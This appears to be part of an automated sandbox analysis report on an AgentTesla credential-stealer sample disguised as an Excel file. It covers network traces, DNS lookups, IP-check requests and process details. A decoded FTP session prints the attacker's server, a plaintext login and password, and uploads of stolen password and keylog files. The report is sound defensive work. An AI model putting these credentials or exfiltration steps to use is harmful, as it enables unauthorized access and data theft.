                      Jul 4, 2024 03:39:55.693278074 CEST44349732172.67.74.152192.168.2.4
                      Jul 4, 2024 03:39:55.693329096 CEST44349732172.67.74.152192.168.2.4
                      Jul 4, 2024 03:39:55.693377972 CEST49732443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:39:55.699968100 CEST49732443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:39:56.257356882 CEST4973421192.168.2.4213.189.52.181
                      Jul 4, 2024 03:39:56.262276888 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:56.262353897 CEST4973421192.168.2.4213.189.52.181
                      Jul 4, 2024 03:39:56.854809046 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:56.856002092 CEST4973421192.168.2.4213.189.52.181
                      Jul 4, 2024 03:39:56.860702038 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:57.049648046 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:57.049877882 CEST4973421192.168.2.4213.189.52.181
                      Jul 4, 2024 03:39:57.054631948 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:57.313311100 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:57.313450098 CEST4973421192.168.2.4213.189.52.181
                      Jul 4, 2024 03:39:57.318166018 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:57.507239103 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:57.507504940 CEST4973421192.168.2.4213.189.52.181
                      Jul 4, 2024 03:39:57.512269020 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:57.819525003 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:57.819679976 CEST4973421192.168.2.4213.189.52.181
                      Jul 4, 2024 03:39:57.825540066 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:58.015209913 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:58.015336037 CEST4973421192.168.2.4213.189.52.181
                      Jul 4, 2024 03:39:58.020136118 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:58.209422112 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:58.209889889 CEST4973663817192.168.2.4213.189.52.181
                      Jul 4, 2024 03:39:58.216576099 CEST6381749736213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:58.216658115 CEST4973663817192.168.2.4213.189.52.181
                      Jul 4, 2024 03:39:58.216698885 CEST4973421192.168.2.4213.189.52.181
                      Jul 4, 2024 03:39:58.224208117 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:58.792100906 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:58.804071903 CEST4973663817192.168.2.4213.189.52.181
                      Jul 4, 2024 03:39:58.804104090 CEST4973663817192.168.2.4213.189.52.181
                      Jul 4, 2024 03:39:58.808969021 CEST6381749736213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:58.809226036 CEST6381749736213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:58.809277058 CEST4973663817192.168.2.4213.189.52.181
                      Jul 4, 2024 03:39:58.843323946 CEST4973421192.168.2.4213.189.52.181
                      Jul 4, 2024 03:39:59.001622915 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:39:59.046457052 CEST4973421192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:09.397943020 CEST49738443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:40:09.397980928 CEST44349738172.67.74.152192.168.2.4
                      Jul 4, 2024 03:40:09.398046017 CEST49738443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:40:09.402518988 CEST49738443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:40:09.402534008 CEST44349738172.67.74.152192.168.2.4
                      Jul 4, 2024 03:40:09.883938074 CEST44349738172.67.74.152192.168.2.4
                      Jul 4, 2024 03:40:09.884008884 CEST49738443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:40:09.885421038 CEST49738443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:40:09.885427952 CEST44349738172.67.74.152192.168.2.4
                      Jul 4, 2024 03:40:09.885624886 CEST44349738172.67.74.152192.168.2.4
                      Jul 4, 2024 03:40:09.929378986 CEST49738443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:40:09.972516060 CEST44349738172.67.74.152192.168.2.4
                      Jul 4, 2024 03:40:10.042368889 CEST44349738172.67.74.152192.168.2.4
                      Jul 4, 2024 03:40:10.042416096 CEST44349738172.67.74.152192.168.2.4
                      Jul 4, 2024 03:40:10.042612076 CEST49738443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:40:10.044898033 CEST49738443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:40:10.725203991 CEST4973921192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:10.731548071 CEST2149739213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:10.731636047 CEST4973921192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:11.355659008 CEST2149739213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:11.355895042 CEST4973921192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:11.362488985 CEST2149739213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:11.559113026 CEST2149739213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:11.559354067 CEST4973921192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:11.564201117 CEST2149739213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:11.846457958 CEST2149739213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:11.846596003 CEST4973921192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:11.851433992 CEST2149739213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:12.048103094 CEST2149739213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:12.048250914 CEST4973921192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:12.053216934 CEST2149739213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:12.251499891 CEST2149739213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:12.253684044 CEST4973921192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:12.258513927 CEST2149739213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:12.455697060 CEST2149739213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:12.456253052 CEST4973921192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:12.464849949 CEST2149739213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:12.661640882 CEST2149739213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:12.669811964 CEST4974163983192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:12.674590111 CEST6398349741213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:12.676861048 CEST4974163983192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:12.687825918 CEST4973921192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:12.696178913 CEST2149739213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:13.264635086 CEST2149739213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:13.264826059 CEST4974163983192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:13.264859915 CEST4974163983192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:13.269740105 CEST6398349741213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:13.270378113 CEST6398349741213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:13.270425081 CEST4974163983192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:13.310383081 CEST4973921192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:13.465313911 CEST2149739213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:13.515228033 CEST4973921192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:17.666731119 CEST49747443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:40:17.666771889 CEST44349747172.67.74.152192.168.2.4
                      Jul 4, 2024 03:40:17.666829109 CEST49747443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:40:17.671319008 CEST49747443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:40:17.671331882 CEST44349747172.67.74.152192.168.2.4
                      Jul 4, 2024 03:40:18.150641918 CEST44349747172.67.74.152192.168.2.4
                      Jul 4, 2024 03:40:18.150718927 CEST49747443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:40:18.154480934 CEST49747443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:40:18.154495001 CEST44349747172.67.74.152192.168.2.4
                      Jul 4, 2024 03:40:18.154706001 CEST44349747172.67.74.152192.168.2.4
                      Jul 4, 2024 03:40:18.202620983 CEST49747443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:40:18.248507977 CEST44349747172.67.74.152192.168.2.4
                      Jul 4, 2024 03:40:18.314034939 CEST44349747172.67.74.152192.168.2.4
                      Jul 4, 2024 03:40:18.314079046 CEST44349747172.67.74.152192.168.2.4
                      Jul 4, 2024 03:40:18.314146042 CEST49747443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:40:18.316545963 CEST49747443192.168.2.4172.67.74.152
                      Jul 4, 2024 03:40:18.891863108 CEST4974821192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:18.896891117 CEST2149748213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:18.896972895 CEST4974821192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:19.049181938 CEST4973921192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:19.534673929 CEST2149748213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:19.534892082 CEST4974821192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:19.539784908 CEST2149748213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:19.729156971 CEST2149748213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:19.739253998 CEST4974821192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:19.744301081 CEST2149748213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:20.005039930 CEST2149748213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:20.005326986 CEST4974821192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:20.010812998 CEST2149748213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:20.198582888 CEST2149748213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:20.198988914 CEST4974821192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:20.203742027 CEST2149748213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:20.391247034 CEST2149748213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:20.394088030 CEST4974821192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:20.398964882 CEST2149748213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:20.586445093 CEST2149748213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:20.587260008 CEST4974821192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:20.592128038 CEST2149748213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:20.779877901 CEST2149748213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:20.780471087 CEST4974963065192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:20.785348892 CEST6306549749213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:20.785429001 CEST4974963065192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:20.785490036 CEST4974821192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:20.790344954 CEST2149748213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:21.384763002 CEST2149748213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:21.384960890 CEST4974963065192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:21.385020018 CEST4974963065192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:21.389760971 CEST6306549749213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:21.390194893 CEST6306549749213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:21.390259027 CEST4974963065192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:21.437129021 CEST4974821192.168.2.4213.189.52.181
                      Jul 4, 2024 03:40:21.581048965 CEST2149748213.189.52.181192.168.2.4
                      Jul 4, 2024 03:40:21.624721050 CEST4974821192.168.2.4213.189.52.181
                      Jul 4, 2024 03:41:22.715984106 CEST4973421192.168.2.4213.189.52.181
                      Jul 4, 2024 03:41:22.722846985 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:41:22.920361042 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:41:22.920926094 CEST4975163014192.168.2.4213.189.52.181
                      Jul 4, 2024 03:41:22.927141905 CEST6301449751213.189.52.181192.168.2.4
                      Jul 4, 2024 03:41:22.927221060 CEST4975163014192.168.2.4213.189.52.181
                      Jul 4, 2024 03:41:22.927309036 CEST4973421192.168.2.4213.189.52.181
                      Jul 4, 2024 03:41:22.932137966 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:41:23.727524042 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:41:23.727694988 CEST4975163014192.168.2.4213.189.52.181
                      Jul 4, 2024 03:41:23.727731943 CEST4975163014192.168.2.4213.189.52.181
                      Jul 4, 2024 03:41:23.732517958 CEST6301449751213.189.52.181192.168.2.4
                      Jul 4, 2024 03:41:23.732963085 CEST6301449751213.189.52.181192.168.2.4
                      Jul 4, 2024 03:41:23.733006954 CEST4975163014192.168.2.4213.189.52.181
                      Jul 4, 2024 03:41:23.737494946 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:41:23.737540960 CEST4973421192.168.2.4213.189.52.181
                      Jul 4, 2024 03:41:23.924913883 CEST2149734213.189.52.181192.168.2.4
                      Jul 4, 2024 03:41:23.968507051 CEST4973421192.168.2.4213.189.52.181
                      TimestampSource PortDest PortSource IPDest IP
                      Jul 4, 2024 03:39:54.839354038 CEST5758053192.168.2.41.1.1.1
                      Jul 4, 2024 03:39:54.846400976 CEST53575801.1.1.1192.168.2.4
                      Jul 4, 2024 03:39:56.244360924 CEST6238653192.168.2.41.1.1.1
                      Jul 4, 2024 03:39:56.256742001 CEST53623861.1.1.1192.168.2.4
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jul 4, 2024 03:39:54.839354038 CEST192.168.2.41.1.1.10x985fStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                      Jul 4, 2024 03:39:56.244360924 CEST192.168.2.41.1.1.10xfdefStandard query (0)s4.serv00.comA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jul 4, 2024 03:39:54.846400976 CEST1.1.1.1192.168.2.40x985fNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                      Jul 4, 2024 03:39:54.846400976 CEST1.1.1.1192.168.2.40x985fNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                      Jul 4, 2024 03:39:54.846400976 CEST1.1.1.1192.168.2.40x985fNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                      Jul 4, 2024 03:39:56.256742001 CEST1.1.1.1192.168.2.40xfdefNo error (0)s4.serv00.com213.189.52.181A (IP address)IN (0x0001)false
                      • api.ipify.org
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.449732172.67.74.1524437180C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe
                      TimestampBytes transferredDirectionData
                      2024-07-04 01:39:55 UTC155OUTGET / HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                      Host: api.ipify.org
                      Connection: Keep-Alive
                      2024-07-04 01:39:55 UTC211INHTTP/1.1 200 OK
                      Date: Thu, 04 Jul 2024 01:39:55 GMT
                      Content-Type: text/plain
                      Content-Length: 11
                      Connection: close
                      Vary: Origin
                      CF-Cache-Status: DYNAMIC
                      Server: cloudflare
                      CF-RAY: 89db6780babe43fe-EWR
                      2024-07-04 01:39:55 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                      Data Ascii: 8.46.123.33


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.449738172.67.74.1524437484C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                      TimestampBytes transferredDirectionData
                      2024-07-04 01:40:09 UTC155OUTGET / HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                      Host: api.ipify.org
                      Connection: Keep-Alive
                      2024-07-04 01:40:10 UTC211INHTTP/1.1 200 OK
                      Date: Thu, 04 Jul 2024 01:40:09 GMT
                      Content-Type: text/plain
                      Content-Length: 11
                      Connection: close
                      Vary: Origin
                      CF-Cache-Status: DYNAMIC
                      Server: cloudflare
                      CF-RAY: 89db67da6c274277-EWR
                      2024-07-04 01:40:10 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                      Data Ascii: 8.46.123.33


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.449747172.67.74.1524437828C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                      TimestampBytes transferredDirectionData
                      2024-07-04 01:40:18 UTC155OUTGET / HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                      Host: api.ipify.org
                      Connection: Keep-Alive
                      2024-07-04 01:40:18 UTC211INHTTP/1.1 200 OK
                      Date: Thu, 04 Jul 2024 01:40:18 GMT
                      Content-Type: text/plain
                      Content-Length: 11
                      Connection: close
                      Vary: Origin
                      CF-Cache-Status: DYNAMIC
                      Server: cloudflare
                      CF-RAY: 89db680e1e46192c-EWR
                      2024-07-04 01:40:18 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                      Data Ascii: 8.46.123.33


                      TimestampSource PortDest PortSource IPDest IPCommands
                      Jul 4, 2024 03:39:56.854809046 CEST2149734213.189.52.181192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 03:39. Server port: 21.
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 03:39. Server port: 21.220-This is a private system - No anonymous login
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 03:39. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                      Jul 4, 2024 03:39:56.856002092 CEST4973421192.168.2.4213.189.52.181USER f2241_dol
                      Jul 4, 2024 03:39:57.049648046 CEST2149734213.189.52.181192.168.2.4331 User f2241_dol OK. Password required
                      Jul 4, 2024 03:39:57.049877882 CEST4973421192.168.2.4213.189.52.181PASS Doll900#@
                      Jul 4, 2024 03:39:57.313311100 CEST2149734213.189.52.181192.168.2.4230 OK. Current restricted directory is /
                      Jul 4, 2024 03:39:57.507239103 CEST2149734213.189.52.181192.168.2.4504 Unknown command
                      Jul 4, 2024 03:39:57.507504940 CEST4973421192.168.2.4213.189.52.181PWD
                      Jul 4, 2024 03:39:57.819525003 CEST2149734213.189.52.181192.168.2.4257 "/" is your current location
                      Jul 4, 2024 03:39:57.819679976 CEST4973421192.168.2.4213.189.52.181TYPE I
                      Jul 4, 2024 03:39:58.015209913 CEST2149734213.189.52.181192.168.2.4200 TYPE is now 8-bit binary
                      Jul 4, 2024 03:39:58.015336037 CEST4973421192.168.2.4213.189.52.181PASV
                      Jul 4, 2024 03:39:58.209422112 CEST2149734213.189.52.181192.168.2.4227 Entering Passive Mode (213,189,52,181,249,73)
                      Jul 4, 2024 03:39:58.216698885 CEST4973421192.168.2.4213.189.52.181STOR PW_user-066656_2024_07_03_21_39_55.html
                      Jul 4, 2024 03:39:58.792100906 CEST2149734213.189.52.181192.168.2.4150 Accepted data connection
                      Jul 4, 2024 03:39:59.001622915 CEST2149734213.189.52.181192.168.2.4226-File successfully transferred
                      226-File successfully transferred226 0.209 seconds (measured here), 1.62 Kbytes per second
                      Jul 4, 2024 03:40:11.355659008 CEST2149739213.189.52.181192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 03:40. Server port: 21.
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 03:40. Server port: 21.220-This is a private system - No anonymous login
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 03:40. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                      Jul 4, 2024 03:40:11.355895042 CEST4973921192.168.2.4213.189.52.181USER f2241_dol
                      Jul 4, 2024 03:40:11.559113026 CEST2149739213.189.52.181192.168.2.4331 User f2241_dol OK. Password required
                      Jul 4, 2024 03:40:11.559354067 CEST4973921192.168.2.4213.189.52.181PASS Doll900#@
                      Jul 4, 2024 03:40:11.846457958 CEST2149739213.189.52.181192.168.2.4230 OK. Current restricted directory is /
                      Jul 4, 2024 03:40:12.048103094 CEST2149739213.189.52.181192.168.2.4504 Unknown command
                      Jul 4, 2024 03:40:12.048250914 CEST4973921192.168.2.4213.189.52.181PWD
                      Jul 4, 2024 03:40:12.251499891 CEST2149739213.189.52.181192.168.2.4257 "/" is your current location
                      Jul 4, 2024 03:40:12.253684044 CEST4973921192.168.2.4213.189.52.181TYPE I
                      Jul 4, 2024 03:40:12.455697060 CEST2149739213.189.52.181192.168.2.4200 TYPE is now 8-bit binary
                      Jul 4, 2024 03:40:12.456253052 CEST4973921192.168.2.4213.189.52.181PASV
                      Jul 4, 2024 03:40:12.661640882 CEST2149739213.189.52.181192.168.2.4227 Entering Passive Mode (213,189,52,181,249,239)
                      Jul 4, 2024 03:40:12.687825918 CEST4973921192.168.2.4213.189.52.181STOR PW_user-066656_2024_07_03_21_40_10.html
                      Jul 4, 2024 03:40:13.264635086 CEST2149739213.189.52.181192.168.2.4150 Accepted data connection
                      Jul 4, 2024 03:40:13.465313911 CEST2149739213.189.52.181192.168.2.4226-File successfully transferred
                      226-File successfully transferred226 0.202 seconds (measured here), 1.67 Kbytes per second
                      Jul 4, 2024 03:40:19.534673929 CEST2149748213.189.52.181192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 03:40. Server port: 21.
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 03:40. Server port: 21.220-This is a private system - No anonymous login
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 03:40. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                      Jul 4, 2024 03:40:19.534892082 CEST4974821192.168.2.4213.189.52.181USER f2241_dol
                      Jul 4, 2024 03:40:19.729156971 CEST2149748213.189.52.181192.168.2.4331 User f2241_dol OK. Password required
                      Jul 4, 2024 03:40:19.739253998 CEST4974821192.168.2.4213.189.52.181PASS Doll900#@
                      Jul 4, 2024 03:40:20.005039930 CEST2149748213.189.52.181192.168.2.4230 OK. Current restricted directory is /
                      Jul 4, 2024 03:40:20.198582888 CEST2149748213.189.52.181192.168.2.4504 Unknown command
                      Jul 4, 2024 03:40:20.198988914 CEST4974821192.168.2.4213.189.52.181PWD
                      Jul 4, 2024 03:40:20.391247034 CEST2149748213.189.52.181192.168.2.4257 "/" is your current location
                      Jul 4, 2024 03:40:20.394088030 CEST4974821192.168.2.4213.189.52.181TYPE I
                      Jul 4, 2024 03:40:20.586445093 CEST2149748213.189.52.181192.168.2.4200 TYPE is now 8-bit binary
                      Jul 4, 2024 03:40:20.587260008 CEST4974821192.168.2.4213.189.52.181PASV
                      Jul 4, 2024 03:40:20.779877901 CEST2149748213.189.52.181192.168.2.4227 Entering Passive Mode (213,189,52,181,246,89)
                      Jul 4, 2024 03:40:20.785490036 CEST4974821192.168.2.4213.189.52.181STOR PW_user-066656_2024_07_03_21_40_18.html
                      Jul 4, 2024 03:40:21.384763002 CEST2149748213.189.52.181192.168.2.4150 Accepted data connection
                      Jul 4, 2024 03:40:21.581048965 CEST2149748213.189.52.181192.168.2.4226-File successfully transferred
                      226-File successfully transferred226 0.225 seconds (measured here), 1.50 Kbytes per second
                      Jul 4, 2024 03:41:22.715984106 CEST4973421192.168.2.4213.189.52.181PASV
                      Jul 4, 2024 03:41:22.920361042 CEST2149734213.189.52.181192.168.2.4227 Entering Passive Mode (213,189,52,181,246,38)
                      Jul 4, 2024 03:41:22.927309036 CEST4973421192.168.2.4213.189.52.181STOR KL_user-066656_2024_07_20_03_22_47.html
                      Jul 4, 2024 03:41:23.727524042 CEST2149734213.189.52.181192.168.2.4150 Accepted data connection
                      Jul 4, 2024 03:41:23.737494946 CEST2149734213.189.52.181192.168.2.4150 Accepted data connection
                      Jul 4, 2024 03:41:23.924913883 CEST2149734213.189.52.181192.168.2.4226-File successfully transferred
                      226-File successfully transferred226 0.423 seconds (measured here), 0.66 Kbytes per second

                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:21:39:52
                      Start date:03/07/2024
                      Path:C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe"
                      Imagebase:0xa10000
                      File size:757'248 bytes
                      MD5 hash:1154CD3205E7E1226B03B1EE15278E0A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1644979202.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1644979202.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Target ID:2
                      Start time:21:39:54
                      Start date:03/07/2024
                      Path:C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe"
                      Imagebase:0x970000
                      File size:757'248 bytes
                      MD5 hash:1154CD3205E7E1226B03B1EE15278E0A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4099468817.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4099468817.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4099468817.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      Target ID:3
                      Start time:21:40:07
                      Start date:03/07/2024
                      Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                      Imagebase:0xa80000
                      File size:757'248 bytes
                      MD5 hash:1154CD3205E7E1226B03B1EE15278E0A
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1791642925.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1791642925.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 24%, ReversingLabs
                      • Detection: 30%, Virustotal, Browse
                      Reputation:low
                      Has exited:true

                      Target ID:4
                      Start time:21:40:08
                      Start date:03/07/2024
                      Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                      Imagebase:0x930000
                      File size:757'248 bytes
                      MD5 hash:1154CD3205E7E1226B03B1EE15278E0A
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1875942602.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
